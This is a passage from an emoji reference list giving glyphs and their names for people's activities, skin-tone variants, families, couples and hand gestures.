💆🏾♀️ Woman Getting Massage: Medium-Dark Skin Tone
💆🏿♀️ Woman Getting Massage: Dark Skin Tone
💇 Person Getting Haircut
💇🏻 Person Getting Haircut: Light Skin Tone
💇🏼 Person Getting Haircut: Medium-Light Skin Tone
💇🏽 Person Getting Haircut: Medium Skin Tone
💇🏾 Person Getting Haircut: Medium-Dark Skin Tone
💇🏿 Person Getting Haircut: Dark Skin Tone
💇♂️ Man Getting Haircut
💇🏻♂️ Man Getting Haircut: Light Skin Tone
💇🏼♂️ Man Getting Haircut: Medium-Light Skin Tone
💇🏽♂️ Man Getting Haircut: Medium Skin Tone
💇🏾♂️ Man Getting Haircut: Medium-Dark Skin Tone
💇🏿♂️ Man Getting Haircut: Dark Skin Tone
💇♀️ Woman Getting Haircut
💇🏻♀️ Woman Getting Haircut: Light Skin Tone
💇🏼♀️ Woman Getting Haircut: Medium-Light Skin Tone
💇🏽♀️ Woman Getting Haircut: Medium Skin Tone
💇🏾♀️ Woman Getting Haircut: Medium-Dark Skin Tone
💇🏿♀️ Woman Getting Haircut: Dark Skin Tone
🚶 Person Walking
🚶🏻 Person Walking: Light Skin Tone
🚶🏼 Person Walking: Medium-Light Skin Tone
🚶🏽 Person Walking: Medium Skin Tone
🚶🏾 Person Walking: Medium-Dark Skin Tone
🚶🏿 Person Walking: Dark Skin Tone
🚶♂️ Man Walking
🚶🏻♂️ Man Walking: Light Skin Tone
🚶🏼♂️ Man Walking: Medium-Light Skin Tone
🚶🏽♂️ Man Walking: Medium Skin Tone
🚶🏾♂️ Man Walking: Medium-Dark Skin Tone
🚶🏿♂️ Man Walking: Dark Skin Tone
🚶♀️ Woman Walking
🚶🏻♀️ Woman Walking: Light Skin Tone
🚶🏼♀️ Woman Walking: Medium-Light Skin Tone
🚶🏽♀️ Woman Walking: Medium Skin Tone
🚶🏾♀️ Woman Walking: Medium-Dark Skin Tone
🚶🏿♀️ Woman Walking: Dark Skin Tone
🏃 Person Running
🏃🏻 Person Running: Light Skin Tone
🏃🏼 Person Running: Medium-Light Skin Tone
🏃🏽 Person Running: Medium Skin Tone
🏃🏾 Person Running: Medium-Dark Skin Tone
🏃🏿 Person Running: Dark Skin Tone
🏃♂️ Man Running
🏃🏻♂️ Man Running: Light Skin Tone
🏃🏼♂️ Man Running: Medium-Light Skin Tone
🏃🏽♂️ Man Running: Medium Skin Tone
🏃🏾♂️ Man Running: Medium-Dark Skin Tone
🏃🏿♂️ Man Running: Dark Skin Tone
🏃♀️ Woman Running
🏃🏻♀️ Woman Running: Light Skin Tone
🏃🏼♀️ Woman Running: Medium-Light Skin Tone
🏃🏽♀️ Woman Running: Medium Skin Tone
🏃🏾♀️ Woman Running: Medium-Dark Skin Tone
🏃🏿♀️ Woman Running: Dark Skin Tone
💃 Woman Dancing
💃🏻 Woman Dancing: Light Skin Tone
💃🏼 Woman Dancing: Medium-Light Skin Tone
💃🏽 Woman Dancing: Medium Skin Tone
💃🏾 Woman Dancing: Medium-Dark Skin Tone
💃🏿 Woman Dancing: Dark Skin Tone
🕺 Man Dancing
🕺🏻 Man Dancing: Light Skin Tone
🕺🏼 Man Dancing: Medium-Light Skin Tone
🕺🏽 Man Dancing: Medium Skin Tone
🕺🏾 Man Dancing: Medium-Dark Skin Tone
🕺🏿 Man Dancing: Dark Skin Tone
👯 People With Bunny Ears Partying
👯♂️ Men With Bunny Ears Partying
👯♀️ Women With Bunny Ears Partying
🧖 Person in Steamy Room
🧖🏻 Person in Steamy Room: Light Skin Tone
🧖🏼 Person in Steamy Room: Medium-Light Skin Tone
🧖🏽 Person in Steamy Room: Medium Skin Tone
🧖🏾 Person in Steamy Room: Medium-Dark Skin Tone
🧖🏿 Person in Steamy Room: Dark Skin Tone
🧖♀️ Woman in Steamy Room
🧖🏻♀️ Woman in Steamy Room: Light Skin Tone
🧖🏼♀️ Woman in Steamy Room: Medium-Light Skin Tone
🧖🏽♀️ Woman in Steamy Room: Medium Skin Tone
🧖🏾♀️ Woman in Steamy Room: Medium-Dark Skin Tone
🧖🏿♀️ Woman in Steamy Room: Dark Skin Tone
🧖♂️ Man in Steamy Room
🧖🏻♂️ Man in Steamy Room: Light Skin Tone
🧖🏼♂️ Man in Steamy Room: Medium-Light Skin Tone
🧖🏽♂️ Man in Steamy Room: Medium Skin Tone
🧖🏾♂️ Man in Steamy Room: Medium-Dark Skin Tone
🧖🏿♂️ Man in Steamy Room: Dark Skin Tone
🧗 Person Climbing
🧗🏻 Person Climbing: Light Skin Tone
🧗🏼 Person Climbing: Medium-Light Skin Tone
🧗🏽 Person Climbing: Medium Skin Tone
🧗🏾 Person Climbing: Medium-Dark Skin Tone
🧗🏿 Person Climbing: Dark Skin Tone
🧗♀️ Woman Climbing
🧗🏻♀️ Woman Climbing: Light Skin Tone
🧗🏼♀️ Woman Climbing: Medium-Light Skin Tone
🧗🏽♀️ Woman Climbing: Medium Skin Tone
🧗🏾♀️ Woman Climbing: Medium-Dark Skin Tone
🧗🏿♀️ Woman Climbing: Dark Skin Tone
🧗♂️ Man Climbing
🧗🏻♂️ Man Climbing: Light Skin Tone
🧗🏼♂️ Man Climbing: Medium-Light Skin Tone
🧗🏽♂️ Man Climbing: Medium Skin Tone
🧗🏾♂️ Man Climbing: Medium-Dark Skin Tone
🧗🏿♂️ Man Climbing: Dark Skin Tone
🧘 Person in Lotus Position
🧘🏻 Person in Lotus Position: Light Skin Tone
🧘🏼 Person in Lotus Position: Medium-Light Skin Tone
🧘🏽 Person in Lotus Position: Medium Skin Tone
🧘🏾 Person in Lotus Position: Medium-Dark Skin Tone
🧘🏿 Person in Lotus Position: Dark Skin Tone
🧘♀️ Woman in Lotus Position
🧘🏻♀️ Woman in Lotus Position: Light Skin Tone
🧘🏼♀️ Woman in Lotus Position: Medium-Light Skin Tone
🧘🏽♀️ Woman in Lotus Position: Medium Skin Tone
🧘🏾♀️ Woman in Lotus Position: Medium-Dark Skin Tone
🧘🏿♀️ Woman in Lotus Position: Dark Skin Tone
🧘♂️ Man in Lotus Position
🧘🏻♂️ Man in Lotus Position: Light Skin Tone
🧘🏼♂️ Man in Lotus Position: Medium-Light Skin Tone
🧘🏽♂️ Man in Lotus Position: Medium Skin Tone
🧘🏾♂️ Man in Lotus Position: Medium-Dark Skin Tone
🧘🏿♂️ Man in Lotus Position: Dark Skin Tone
🛀 Person Taking Bath
🛀🏻 Person Taking Bath: Light Skin Tone
🛀🏼 Person Taking Bath: Medium-Light Skin Tone
🛀🏽 Person Taking Bath: Medium Skin Tone
🛀🏾 Person Taking Bath: Medium-Dark Skin Tone
🛀🏿 Person Taking Bath: Dark Skin Tone
🛌 Person in Bed
🛌🏻 Person in Bed: Light Skin Tone
🛌🏼 Person in Bed: Medium-Light Skin Tone
🛌🏽 Person in Bed: Medium Skin Tone
🛌🏾 Person in Bed: Medium-Dark Skin Tone
🛌🏿 Person in Bed: Dark Skin Tone
🕴 Man in Business Suit Levitating
🕴🏻 Man in Business Suit Levitating: Light Skin Tone
🕴🏼 Man in Business Suit Levitating: Medium-Light Skin Tone
🕴🏽 Man in Business Suit Levitating: Medium Skin Tone
🕴🏾 Man in Business Suit Levitating: Medium-Dark Skin Tone
🕴🏿 Man in Business Suit Levitating: Dark Skin Tone
🗣 Speaking Head
👤 Bust in Silhouette
👥 Busts in Silhouette
🤺 Person Fencing
🏇 Horse Racing
🏇🏻 Horse Racing: Light Skin Tone
🏇🏼 Horse Racing: Medium-Light Skin Tone
🏇🏽 Horse Racing: Medium Skin Tone
🏇🏾 Horse Racing: Medium-Dark Skin Tone
🏇🏿 Horse Racing: Dark Skin Tone
⛷ Skier
🏂 Snowboarder
🏂🏻 Snowboarder: Light Skin Tone
🏂🏼 Snowboarder: Medium-Light Skin Tone
🏂🏽 Snowboarder: Medium Skin Tone
🏂🏾 Snowboarder: Medium-Dark Skin Tone
🏂🏿 Snowboarder: Dark Skin Tone
🏌 Person Golfing
🏌🏻 Person Golfing: Light Skin Tone
🏌🏼 Person Golfing: Medium-Light Skin Tone
🏌🏽 Person Golfing: Medium Skin Tone
🏌🏾 Person Golfing: Medium-Dark Skin Tone
🏌🏿 Person Golfing: Dark Skin Tone
🏌️♂️ Man Golfing
🏌🏻♂️ Man Golfing: Light Skin Tone
🏌🏼♂️ Man Golfing: Medium-Light Skin Tone
🏌🏽♂️ Man Golfing: Medium Skin Tone
🏌🏾♂️ Man Golfing: Medium-Dark Skin Tone
🏌🏿♂️ Man Golfing: Dark Skin Tone
🏌️♀️ Woman Golfing
🏌🏻♀️ Woman Golfing: Light Skin Tone
🏌🏼♀️ Woman Golfing: Medium-Light Skin Tone
🏌🏽♀️ Woman Golfing: Medium Skin Tone
🏌🏾♀️ Woman Golfing: Medium-Dark Skin Tone
🏌🏿♀️ Woman Golfing: Dark Skin Tone
🏄 Person Surfing
🏄🏻 Person Surfing: Light Skin Tone
🏄🏼 Person Surfing: Medium-Light Skin Tone
🏄🏽 Person Surfing: Medium Skin Tone
🏄🏾 Person Surfing: Medium-Dark Skin Tone
🏄🏿 Person Surfing: Dark Skin Tone
🏄♂️ Man Surfing
🏄🏻♂️ Man Surfing: Light Skin Tone
🏄🏼♂️ Man Surfing: Medium-Light Skin Tone
🏄🏽♂️ Man Surfing: Medium Skin Tone
🏄🏾♂️ Man Surfing: Medium-Dark Skin Tone
🏄🏿♂️ Man Surfing: Dark Skin Tone
🏄♀️ Woman Surfing
🏄🏻♀️ Woman Surfing: Light Skin Tone
🏄🏼♀️ Woman Surfing: Medium-Light Skin Tone
🏄🏽♀️ Woman Surfing: Medium Skin Tone
🏄🏾♀️ Woman Surfing: Medium-Dark Skin Tone
🏄🏿♀️ Woman Surfing: Dark Skin Tone
🚣 Person Rowing Boat
🚣🏻 Person Rowing Boat: Light Skin Tone
🚣🏼 Person Rowing Boat: Medium-Light Skin Tone
🚣🏽 Person Rowing Boat: Medium Skin Tone
🚣🏾 Person Rowing Boat: Medium-Dark Skin Tone
🚣🏿 Person Rowing Boat: Dark Skin Tone
🚣♂️ Man Rowing Boat
🚣🏻♂️ Man Rowing Boat: Light Skin Tone
🚣🏼♂️ Man Rowing Boat: Medium-Light Skin Tone
🚣🏽♂️ Man Rowing Boat: Medium Skin Tone
🚣🏾♂️ Man Rowing Boat: Medium-Dark Skin Tone
🚣🏿♂️ Man Rowing Boat: Dark Skin Tone
🚣♀️ Woman Rowing Boat
🚣🏻♀️ Woman Rowing Boat: Light Skin Tone
🚣🏼♀️ Woman Rowing Boat: Medium-Light Skin Tone
🚣🏽♀️ Woman Rowing Boat: Medium Skin Tone
🚣🏾♀️ Woman Rowing Boat: Medium-Dark Skin Tone
🚣🏿♀️ Woman Rowing Boat: Dark Skin Tone
🏊 Person Swimming
🏊🏻 Person Swimming: Light Skin Tone
🏊🏼 Person Swimming: Medium-Light Skin Tone
🏊🏽 Person Swimming: Medium Skin Tone
🏊🏾 Person Swimming: Medium-Dark Skin Tone
🏊🏿 Person Swimming: Dark Skin Tone
🏊♂️ Man Swimming
🏊🏻♂️ Man Swimming: Light Skin Tone
🏊🏼♂️ Man Swimming: Medium-Light Skin Tone
🏊🏽♂️ Man Swimming: Medium Skin Tone
🏊🏾♂️ Man Swimming: Medium-Dark Skin Tone
🏊🏿♂️ Man Swimming: Dark Skin Tone
🏊♀️ Woman Swimming
🏊🏻♀️ Woman Swimming: Light Skin Tone
🏊🏼♀️ Woman Swimming: Medium-Light Skin Tone
🏊🏽♀️ Woman Swimming: Medium Skin Tone
🏊🏾♀️ Woman Swimming: Medium-Dark Skin Tone
🏊🏿♀️ Woman Swimming: Dark Skin Tone
⛹ Person Bouncing Ball
⛹🏻 Person Bouncing Ball: Light Skin Tone
⛹🏼 Person Bouncing Ball: Medium-Light Skin Tone
⛹🏽 Person Bouncing Ball: Medium Skin Tone
⛹🏾 Person Bouncing Ball: Medium-Dark Skin Tone
⛹🏿 Person Bouncing Ball: Dark Skin Tone
⛹️♂️ Man Bouncing Ball
⛹🏻♂️ Man Bouncing Ball: Light Skin Tone
⛹🏼♂️ Man Bouncing Ball: Medium-Light Skin Tone
⛹🏽♂️ Man Bouncing Ball: Medium Skin Tone
⛹🏾♂️ Man Bouncing Ball: Medium-Dark Skin Tone
⛹🏿♂️ Man Bouncing Ball: Dark Skin Tone
⛹️♀️ Woman Bouncing Ball
⛹🏻♀️ Woman Bouncing Ball: Light Skin Tone
⛹🏼♀️ Woman Bouncing Ball: Medium-Light Skin Tone
⛹🏽♀️ Woman Bouncing Ball: Medium Skin Tone
⛹🏾♀️ Woman Bouncing Ball: Medium-Dark Skin Tone
⛹🏿♀️ Woman Bouncing Ball: Dark Skin Tone
🏋 Person Lifting Weights
🏋🏻 Person Lifting Weights: Light Skin Tone
🏋🏼 Person Lifting Weights: Medium-Light Skin Tone
🏋🏽 Person Lifting Weights: Medium Skin Tone
🏋🏾 Person Lifting Weights: Medium-Dark Skin Tone
🏋🏿 Person Lifting Weights: Dark Skin Tone
🏋️♂️ Man Lifting Weights
🏋🏻♂️ Man Lifting Weights: Light Skin Tone
🏋🏼♂️ Man Lifting Weights: Medium-Light Skin Tone
🏋🏽♂️ Man Lifting Weights: Medium Skin Tone
🏋🏾♂️ Man Lifting Weights: Medium-Dark Skin Tone
🏋🏿♂️ Man Lifting Weights: Dark Skin Tone
🏋️♀️ Woman Lifting Weights
🏋🏻♀️ Woman Lifting Weights: Light Skin Tone
🏋🏼♀️ Woman Lifting Weights: Medium-Light Skin Tone
🏋🏽♀️ Woman Lifting Weights: Medium Skin Tone
🏋🏾♀️ Woman Lifting Weights: Medium-Dark Skin Tone
🏋🏿♀️ Woman Lifting Weights: Dark Skin Tone
🚴 Person Biking
🚴🏻 Person Biking: Light Skin Tone
🚴🏼 Person Biking: Medium-Light Skin Tone
🚴🏽 Person Biking: Medium Skin Tone
🚴🏾 Person Biking: Medium-Dark Skin Tone
🚴🏿 Person Biking: Dark Skin Tone
🚴♂️ Man Biking
🚴🏻♂️ Man Biking: Light Skin Tone
🚴🏼♂️ Man Biking: Medium-Light Skin Tone
🚴🏽♂️ Man Biking: Medium Skin Tone
🚴🏾♂️ Man Biking: Medium-Dark Skin Tone
🚴🏿♂️ Man Biking: Dark Skin Tone
🚴♀️ Woman Biking
🚴🏻♀️ Woman Biking: Light Skin Tone
🚴🏼♀️ Woman Biking: Medium-Light Skin Tone
🚴🏽♀️ Woman Biking: Medium Skin Tone
🚴🏾♀️ Woman Biking: Medium-Dark Skin Tone
🚴🏿♀️ Woman Biking: Dark Skin Tone
🚵 Person Mountain Biking
🚵🏻 Person Mountain Biking: Light Skin Tone
🚵🏼 Person Mountain Biking: Medium-Light Skin Tone
🚵🏽 Person Mountain Biking: Medium Skin Tone
🚵🏾 Person Mountain Biking: Medium-Dark Skin Tone
🚵🏿 Person Mountain Biking: Dark Skin Tone
🚵♂️ Man Mountain Biking
🚵🏻♂️ Man Mountain Biking: Light Skin Tone
🚵🏼♂️ Man Mountain Biking: Medium-Light Skin Tone
🚵🏽♂️ Man Mountain Biking: Medium Skin Tone
🚵🏾♂️ Man Mountain Biking: Medium-Dark Skin Tone
🚵🏿♂️ Man Mountain Biking: Dark Skin Tone
🚵♀️ Woman Mountain Biking
🚵🏻♀️ Woman Mountain Biking: Light Skin Tone
🚵🏼♀️ Woman Mountain Biking: Medium-Light Skin Tone
🚵🏽♀️ Woman Mountain Biking: Medium Skin Tone
🚵🏾♀️ Woman Mountain Biking: Medium-Dark Skin Tone
🚵🏿♀️ Woman Mountain Biking: Dark Skin Tone
🏎 Racing Car
🏍 Motorcycle
🤸 Person Cartwheeling
🤸🏻 Person Cartwheeling: Light Skin Tone
🤸🏼 Person Cartwheeling: Medium-Light Skin Tone
🤸🏽 Person Cartwheeling: Medium Skin Tone
🤸🏾 Person Cartwheeling: Medium-Dark Skin Tone
🤸🏿 Person Cartwheeling: Dark Skin Tone
🤸♂️ Man Cartwheeling
🤸🏻♂️ Man Cartwheeling: Light Skin Tone
🤸🏼♂️ Man Cartwheeling: Medium-Light Skin Tone
🤸🏽♂️ Man Cartwheeling: Medium Skin Tone
🤸🏾♂️ Man Cartwheeling: Medium-Dark Skin Tone
🤸🏿♂️ Man Cartwheeling: Dark Skin Tone
🤸♀️ Woman Cartwheeling
🤸🏻♀️ Woman Cartwheeling: Light Skin Tone
🤸🏼♀️ Woman Cartwheeling: Medium-Light Skin Tone
🤸🏽♀️ Woman Cartwheeling: Medium Skin Tone
🤸🏾♀️ Woman Cartwheeling: Medium-Dark Skin Tone
🤸🏿♀️ Woman Cartwheeling: Dark Skin Tone
🤼 People Wrestling
🤼♂️ Men Wrestling
🤼♀️ Women Wrestling
🤽 Person Playing Water Polo
🤽🏻 Person Playing Water Polo: Light Skin Tone
🤽🏼 Person Playing Water Polo: Medium-Light Skin Tone
🤽🏽 Person Playing Water Polo: Medium Skin Tone
🤽🏾 Person Playing Water Polo: Medium-Dark Skin Tone
🤽🏿 Person Playing Water Polo: Dark Skin Tone
🤽♂️ Man Playing Water Polo
🤽🏻♂️ Man Playing Water Polo: Light Skin Tone
🤽🏼♂️ Man Playing Water Polo: Medium-Light Skin Tone
🤽🏽♂️ Man Playing Water Polo: Medium Skin Tone
🤽🏾♂️ Man Playing Water Polo: Medium-Dark Skin Tone
🤽🏿♂️ Man Playing Water Polo: Dark Skin Tone
🤽♀️ Woman Playing Water Polo
🤽🏻♀️ Woman Playing Water Polo: Light Skin Tone
🤽🏼♀️ Woman Playing Water Polo: Medium-Light Skin Tone
🤽🏽♀️ Woman Playing Water Polo: Medium Skin Tone
🤽🏾♀️ Woman Playing Water Polo: Medium-Dark Skin Tone
🤽🏿♀️ Woman Playing Water Polo: Dark Skin Tone
🤾 Person Playing Handball
🤾🏻 Person Playing Handball: Light Skin Tone
🤾🏼 Person Playing Handball: Medium-Light Skin Tone
🤾🏽 Person Playing Handball: Medium Skin Tone
🤾🏾 Person Playing Handball: Medium-Dark Skin Tone
🤾🏿 Person Playing Handball: Dark Skin Tone
🤾♂️ Man Playing Handball
🤾🏻♂️ Man Playing Handball: Light Skin Tone
🤾🏼♂️ Man Playing Handball: Medium-Light Skin Tone
🤾🏽♂️ Man Playing Handball: Medium Skin Tone
🤾🏾♂️ Man Playing Handball: Medium-Dark Skin Tone
🤾🏿♂️ Man Playing Handball: Dark Skin Tone
🤾♀️ Woman Playing Handball
🤾🏻♀️ Woman Playing Handball: Light Skin Tone
🤾🏼♀️ Woman Playing Handball: Medium-Light Skin Tone
🤾🏽♀️ Woman Playing Handball: Medium Skin Tone
🤾🏾♀️ Woman Playing Handball: Medium-Dark Skin Tone
🤾🏿♀️ Woman Playing Handball: Dark Skin Tone
🤹 Person Juggling
🤹🏻 Person Juggling: Light Skin Tone
🤹🏼 Person Juggling: Medium-Light Skin Tone
🤹🏽 Person Juggling: Medium Skin Tone
🤹🏾 Person Juggling: Medium-Dark Skin Tone
🤹🏿 Person Juggling: Dark Skin Tone
🤹♂️ Man Juggling
🤹🏻♂️ Man Juggling: Light Skin Tone
🤹🏼♂️ Man Juggling: Medium-Light Skin Tone
🤹🏽♂️ Man Juggling: Medium Skin Tone
🤹🏾♂️ Man Juggling: Medium-Dark Skin Tone
🤹🏿♂️ Man Juggling: Dark Skin Tone
🤹♀️ Woman Juggling
🤹🏻♀️ Woman Juggling: Light Skin Tone
🤹🏼♀️ Woman Juggling: Medium-Light Skin Tone
🤹🏽♀️ Woman Juggling: Medium Skin Tone
🤹🏾♀️ Woman Juggling: Medium-Dark Skin Tone
🤹🏿♀️ Woman Juggling: Dark Skin Tone
🤼🏻 Wrestlers, Type-1-2
🤼🏼 Wrestlers, Type-3
👫 Man and Woman Holding Hands
🤼🏽 Wrestlers, Type-4
👬 Two Men Holding Hands
🤼🏾 Wrestlers, Type-5
👭 Two Women Holding Hands
🤼🏿 Wrestlers, Type-6
💏 Kiss
👩❤️💋👨 Kiss: Woman, Man
🤼🏻♂️ Men Wrestling, Type-1-2
🤼🏼♂️ Men Wrestling, Type-3
🤼🏽♂️ Men Wrestling, Type-4
👨❤️💋👨 Kiss: Man, Man
🤼🏾♂️ Men Wrestling, Type-5
🤼🏿♂️ Men Wrestling, Type-6
👩❤️💋👩 Kiss: Woman, Woman
🤼🏻♀️ Women Wrestling, Type-1-2
💑 Couple With Heart
🤼🏼♀️ Women Wrestling, Type-3
👩❤️👨 Couple With Heart: Woman, Man
🤼🏽♀️ Women Wrestling, Type-4
🤼🏾♀️ Women Wrestling, Type-5
👨❤️👨 Couple With Heart: Man, Man
🤼🏿♀️ Women Wrestling, Type-6
👩❤️👩 Couple With Heart: Woman, Woman
👪 Family
👨👩👦 Family: Man, Woman, Boy
👨👩👧 Family: Man, Woman, Girl
👨👩👧👦 Family: Man, Woman, Girl, Boy
👨👩👦👦 Family: Man, Woman, Boy, Boy
👨👩👧👧 Family: Man, Woman, Girl, Girl
👨👨👦 Family: Man, Man, Boy
👨👨👧 Family: Man, Man, Girl
👨👨👧👦 Family: Man, Man, Girl, Boy
👨👨👦👦 Family: Man, Man, Boy, Boy
👨👨👧👧 Family: Man, Man, Girl, Girl
👩👩👦 Family: Woman, Woman, Boy
👩👩👧 Family: Woman, Woman, Girl
👩👩👧👦 Family: Woman, Woman, Girl, Boy
👩👩👦👦 Family: Woman, Woman, Boy, Boy
👩👩👧👧 Family: Woman, Woman, Girl, Girl
👨👦 Family: Man, Boy
👨👦👦 Family: Man, Boy, Boy
👨👧 Family: Man, Girl
👨👧👦 Family: Man, Girl, Boy
👨👧👧 Family: Man, Girl, Girl
👩👦 Family: Woman, Boy
👩👦👦 Family: Woman, Boy, Boy
👩👧 Family: Woman, Girl
👩👧👦 Family: Woman, Girl, Boy
👩👧👧 Family: Woman, Girl, Girl
🤳 Selfie
🤳🏻 Selfie: Light Skin Tone
🤳🏼 Selfie: Medium-Light Skin Tone
🤳🏽 Selfie: Medium Skin Tone
🤳🏾 Selfie: Medium-Dark Skin Tone
🤳🏿 Selfie: Dark Skin Tone
💪 Flexed Biceps
💪🏻 Flexed Biceps: Light Skin Tone
💪🏼 Flexed Biceps: Medium-Light Skin Tone
💪🏽 Flexed Biceps: Medium Skin Tone
💪🏾 Flexed Biceps: Medium-Dark Skin Tone
💪🏿 Flexed Biceps: Dark Skin Tone
👈 Backhand Index Pointing Left
👈🏻 Backhand Index Pointing Left: Light Skin Tone
👈🏼 Backhand Index Pointing Left: Medium-Light Skin Tone
👈🏽 Backhand Index Pointing Left: Medium Skin Tone
👈🏾 Backhand Index Pointing Left: Medium-Dark Skin Tone
👈🏿 Backhand Index Pointing Left: Dark Skin Tone
👉 Backhand Index Pointing Right
👉🏻 Backhand Index Pointing Right: Light Skin Tone
👉🏼 Backhand Index Pointing Right: Medium-Light Skin Tone
👉🏽 Backhand Index Pointing Right: Medium Skin Tone
👉🏾 Backhand Index Pointing Right: Medium-Dark Skin Tone
👉🏿 Backhand Index Pointing Right: Dark Skin Tone
☝ Index Pointing Up
☝🏻 Index Pointing Up: Light Skin Tone
☝🏼 Index Pointing Up: Medium-Light Skin Tone
☝🏽 Index Pointing Up: Medium Skin Tone
☝🏾 Index Pointing Up: Medium-Dark Skin Tone
☝🏿 Index Pointing Up: Dark Skin Tone
👆 Backhand Index Pointing Up
👆🏻 Backhand Index Pointing Up: Light Skin Tone
👆🏼 Backhand Index Pointing Up: Medium-Light Skin Tone
👆🏽 Backhand Index Pointing Up: Medium Skin Tone
👆🏾 Backhand Index Pointing Up: Medium-Dark Skin Tone
👆🏿 Backhand Index Pointing Up: Dark Skin Tone
🖕 Middle Finger
🖕🏻 Middle Finger: Light Skin Tone
🖕🏼 Middle Finger: Medium-Light Skin Tone
🖕🏽 Middle Finger: Medium Skin Tone
🖕🏾 Middle Finger: Medium-Dark Skin Tone
🖕🏿 Middle Finger: Dark Skin Tone
👇 Backhand Index Pointing Down
👇🏻 Backhand Index Pointing Down: Light Skin Tone
👇🏼 Backhand Index Pointing Down: Medium-Light Skin Tone
👇🏽 Backhand Index Pointing Down: Medium Skin Tone
👇🏾 Backhand Index Pointing Down: Medium-Dark Skin Tone
👇🏿 Backhand Index Pointing Down: Dark Skin Tone
✌ Victory Hand
✌🏻 Victory Hand: Light Skin Tone
✌🏼 Victory Hand: Medium-Light Skin Tone
✌🏽 Victory Hand: Medium Skin Tone
✌🏾 Victory Hand: Medium-Dark Skin Tone
✌🏿 Victory Hand: Dark Skin Tone
🤞 Crossed Fingers
🤞🏻 Crossed Fingers: Light Skin Tone
🤞🏼 Crossed Fingers: Medium-Light Skin Tone
🤞🏽 Crossed Fingers: Medium Skin Tone
🤞🏾 Crossed Fingers: Medium-Dark Skin Tone
🤞🏿 Crossed Fingers: Dark Skin Tone
🖖 Vulcan Salute
🖖🏻 Vulcan Salute: Light Skin Tone
🖖🏼 Vulcan Salute: Medium-Light Skin Tone
🖖🏽 Vulcan Salute: Medium Skin Tone
🖖🏾 Vulcan Salute: Medium-Dark Skin Tone
🖖🏿 Vulcan Salute: Dark Skin Tone
🤘 Sign of the Horns
🤘🏻 Sign of the Horns: Light Skin Tone
🤘🏼 Sign of the Horns: Medium-Light Skin Tone
🤘🏽 Sign of the Horns: Medium Skin Tone
🤘🏾 Sign of the Horns: Medium-Dark Skin Tone
🤘🏿 Sign of the Horns: Dark Skin Tone
🤙 Call Me Hand
🤙🏻 Call Me Hand: Light Skin Tone
🤙🏼 Call Me Hand: Medium-Light Skin Tone
🤙🏽 Call Me Hand: Medium Skin Tone
🤙🏾 Call Me Hand: Medium-Dark Skin Tone
🤙🏿 Call Me Hand: Dark Skin Tone
🖐 Raised Hand With Fingers Splayed
🖐🏻 Raised Hand With Fingers Splayed: Light Skin Tone
🖐🏼 Raised Hand With Fingers Splayed: Medium-Light Skin Tone
🖐🏽 Raised Hand With Fingers Splayed: Medium Skin Tone
🖐🏾 Raised Hand With Fingers Splayed: Medium-Dark Skin Tone
🖐🏿 Raised Hand With Fingers Splayed: Dark Skin Tone
✋ Raised Hand
✋🏻 Raised Hand: Light Skin Tone
✋🏼 Raised Hand: Medium-Light Skin Tone
✋🏽 Raised Hand: Medium Skin Tone
✋🏾 Raised Hand: Medium-Dark Skin Tone
✋🏿 Raised Hand: Dark Skin Tone
👌 OK Hand
👌🏻 OK Hand: Light Skin Tone
👌🏼 OK Hand: Medium-Light Skin Tone
👌🏽 OK Hand: Medium Skin Tone
👌🏾 OK Hand: Medium-Dark Skin Tone
👌🏿 OK Hand: Dark Skin Tone
👍 Thumbs Up
👍🏻 Thumbs Up: Light Skin Tone
👍🏼 Thumbs Up: Medium-Light Skin Tone
👍🏽 Thumbs Up: Medium Skin Tone
👍🏾 Thumbs Up: Medium-Dark Skin Tone
👍🏿 Thumbs Up: Dark Skin Tone
👎 Thumbs Down
👎🏻 Thumbs Down: Light Skin Tone
👎🏼 Thumbs Down: Medium-Light Skin Tone
👎🏽 Thumbs Down: Medium Skin Tone
👎🏾 Thumbs Down: Medium-Dark Skin Tone
👎🏿 Thumbs Down: Dark Skin Tone
✊ Raised Fist
✊🏻 Raised Fist: Light Skin Tone
✊🏼 Raised Fist: Medium-Light Skin Tone
✊🏽 Raised Fist: Medium Skin Tone
✊🏾 Raised Fist: Medium-Dark Skin Tone
✊🏿 Raised Fist: Dark Skin Tone
👊 Oncoming Fist
👊🏻 Oncoming Fist: Light Skin Tone
👊🏼 Oncoming Fist: Medium-Light Skin Tone
👊🏽 Oncoming Fist: Medium Skin Tone
👊🏾 Oncoming Fist: Medium-Dark Skin Tone
👊🏿 Oncoming Fist: Dark Skin Tone
🤛 Left-Facing Fist
🤛🏻 Left-Facing Fist: Light Skin Tone
🤛🏼 Left-Facing Fist: Medium-Light Skin Tone
🤛🏽 Left-Facing Fist: Medium Skin Tone
🤛🏾 Left-Facing Fist: Medium-Dark Skin Tone
🤛🏿 Left-Facing Fist: Dark Skin Tone
🤜 Right-Facing Fist
🤜🏻 Right-Facing Fist: Light Skin Tone
🤜🏼 Right-Facing Fist: Medium-Light Skin Tone
🤜🏽 Right-Facing Fist: Medium Skin Tone
🤜🏾 Right-Facing Fist: Medium-Dark Skin Tone
🤜🏿 Right-Facing Fist: Dark Skin Tone
🤚 Raised Back of Hand
🤚🏻 Raised Back of Hand: Light Skin Tone
🤚🏼 Raised Back of Hand: Medium-Light Skin Tone
🤚🏽 Raised Back of Hand: Medium Skin Tone
🤚🏾 Raised Back of Hand: Medium-Dark Skin Tone
🤚🏿 Raised Back of Hand: Dark Skin Tone
👋 Waving Hand
👋🏻 Waving Hand: Light Skin Tone
👋🏼 Waving Hand: Medium-Light Skin Tone
👋🏽 Waving Hand: Medium Skin Tone
👋🏾 Waving Hand: Medium-Dark Skin Tone
👋🏿 Waving Hand: Dark Skin Tone
🤟 Love-You Gesture
🤟🏻 Love-You Gesture: Light Skin Tone
🤟🏼 Love-You Gesture: Medium-Light Skin Tone
🤟🏽 Love-You Gesture: Medium Skin Tone
🤟🏾 Love-You Gesture: Medium-Dark Skin Tone
🤟🏿 Love-You Gesture: Dark Skin Tone
✍ Writing Hand
✍🏻 Writing Hand: Light Skin Tone
✍🏼 Writing Hand: Medium-Light Skin Tone
✍🏽 Writing Hand: Medium Skin Tone
✍🏾 Writing Hand: Medium-Dark Skin Tone
✍🏿 Writing Hand: Dark Skin Tone
👏 Clapping Hands
👏🏻 Clapping Hands: Light Skin Tone
👏🏼 Clapping Hands: Medium-Light Skin Tone
👏🏽 Clapping Hands: Medium Skin Tone
👏🏾 Clapping Hands: Medium-Dark Skin Tone
👏🏿 Clapping Hands: Dark Skin Tone
👐 Open Hands
👐🏻 Open Hands: Light Skin Tone
👐🏼 Open Hands: Medium-Light Skin Tone
👐🏽 Open Hands: Medium Skin Tone
